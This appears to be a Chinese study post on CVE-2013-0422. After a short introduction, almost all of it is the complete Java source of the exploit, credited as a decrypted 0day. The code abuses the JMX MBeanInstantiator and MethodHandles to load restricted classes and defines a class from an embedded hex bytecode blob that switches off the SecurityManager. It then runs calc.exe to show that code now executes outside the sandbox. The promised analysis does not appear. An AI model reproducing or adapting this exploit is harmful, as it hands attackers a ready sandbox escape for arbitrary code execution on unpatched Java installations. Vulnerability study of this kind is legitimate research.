CVE-2013-0422 学习
0x01 这个是这两天爆出来的,我构建了一个本地测试代码,主要用来研究,测试方法,直接跑就可以看输出就可以看懂了,具体分析代码见后文
0x02 package test;
/*
Java 0day 1.7.0_10 decrypted source
Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0
From Russia with love.
*/
import java.io.IOException;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.security.Permission;
import java.security.PermissionCollection;
import java.security.Policy;
import java.security.ProtectionDomain;
import java.util.Enumeration;
import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;
public class Test {
void checkPermission() {
ProtectionDomain domain = this.getClass().getProtectionDomain();
PermissionCollection pcoll = Policy.getPolicy().getPermissions(domain);
Enumeration e = pcoll.elements();
int i = 0;
for (; e.hasMoreElements();) {
Permission p = (Permission) e.nextElement();
System.out.println(i + ": " + p);
i++;
}
System.out.println("the num:" + i);
}
void alert() throws IOException {
try {
Runtime.getRuntime().exec("calc.exe");
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
throw e;
}
}
public static void main(String args[]) {
try {
System.out.println("1.SecurityManager 开启前测试");
Test test = new Test();
// test.checkPermission();
try {
test.alert();
System.out.println("2.成功执行 exec");
} catch (SecurityException e) {
System.out.println("2.you have no permission to exec");
}
System.out.println("3.开启SecurityManager");
System.setSecurityManager(new SecurityManager());
System.out.println("4.SecurityManager 开启后测试");
try {
test.alert();
System.out.println("5.成功执行 exec");
} catch (SecurityException e) {
System.out.println("5.you have no permission to exec");
}
byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff);
JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer) localJmxMBeanServerBuilder
.newMBeanServer("", null, null);
MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer
.getMBeanInstantiator();
ClassLoader a = null;
Class localClass1 = localMBeanInstantiator.findClass(
"sun.org.mozilla.javascript.internal.Context", a);
Class localClass2 = localMBeanInstantiator.findClass(
"sun.org.mozilla.javascript.internal.GeneratedClassLoader",
a);
MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
MethodType localMethodType1 = MethodType.methodType(
MethodHandle.class, Class.class,
new Class[] { MethodType.class });
MethodHandle localMethodHandle1 = localLookup.findVirtual(
MethodHandles.Lookup.class, "findConstructor",
localMethodType1);
MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
MethodHandle localMethodHandle2 = (MethodHandle) localMethodHandle1
.invokeWithArguments(new Object[] { localLookup,
localClass1, localMethodType2 });
Object localObject1 = localMethodHandle2
.invokeWithArguments(new Object[0]);
MethodType localMethodType3 = MethodType.methodType(
MethodHandle.class, Class.class, new Class[] {
String.class, MethodType.class });
MethodHandle localMethodHandle3 = localLookup
.findVirtual(MethodHandles.Lookup.class, "findVirtual",
localMethodType3);
MethodType localMethodType4 = MethodType.methodType(localClass2,
ClassLoader.class);
MethodHandle localMethodHandle4;
localMethodHandle4 = (MethodHandle) localMethodHandle3
.invokeWithArguments(new Object[] { localLookup,
localClass1, "createClassLoader", localMethodType4 });
Object localObject2 = localMethodHandle4
.invokeWithArguments(new Object[] { localObject1, null });
MethodType localMethodType5 = MethodType.methodType(Class.class,
String.class, new Class[] { byte[].class });
MethodHandle localMethodHandle5 = (MethodHandle) localMethodHandle3
.invokeWithArguments(new Object[] { localLookup,
localClass2, "defineClass", localMethodType5 });
Class localClass3 = (Class) localMethodHandle5
.invokeWithArguments(new Object[] { localObject2, null,
arrayOfByte });
localClass3.newInstance();
System.out.println("6.CVE-2013-0422执行后");
try {
test.alert();
System.out.println("7.成功执行 exec");
} catch (SecurityException e) {
System.out.println("7.you have no permission to exec");
}
} catch (Throwable e1) {
// TODO Auto-generated catch block
e1.printStackTrace();
}
}
public static byte[] hex2Byte(String paramString)
{
byte[] arrayOfByte = new byte[paramString.length() / 2];
for (int i = 0; i < arrayOfByte.length; i++)
{
arrayOfByte[i] = (byte) Integer.parseInt(
paramString.substring(2 * i, 2 * i + 2), 16);
}
return arrayOfByte;
}
public static String ByteArrayWithSecOff = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F07002001"
+ "00063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C6501"
+ "00124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F4578"
+ "63657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F"
+ "07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F757263"
+ "6546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F"
+ "457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A65637401000142"
+ "0100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E41637469"
+ "6F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F"
+ "50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C6567656445"
+ "7863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176"
+ "612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A"
+ "6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000"
+ "020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100"
+ "040009000C00030003000B000000120004000000080004000B0009000C000D000D000C0000001600"
+ "02000D0000000D000E00010000000E000F001000000011000000100002FF000C0001070012000107"
+ "0013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B0000000"
+ "02000B0000000A00020000001000040011000C0000000C00010000000C000F001000000001001600"
+ "0000020017";
}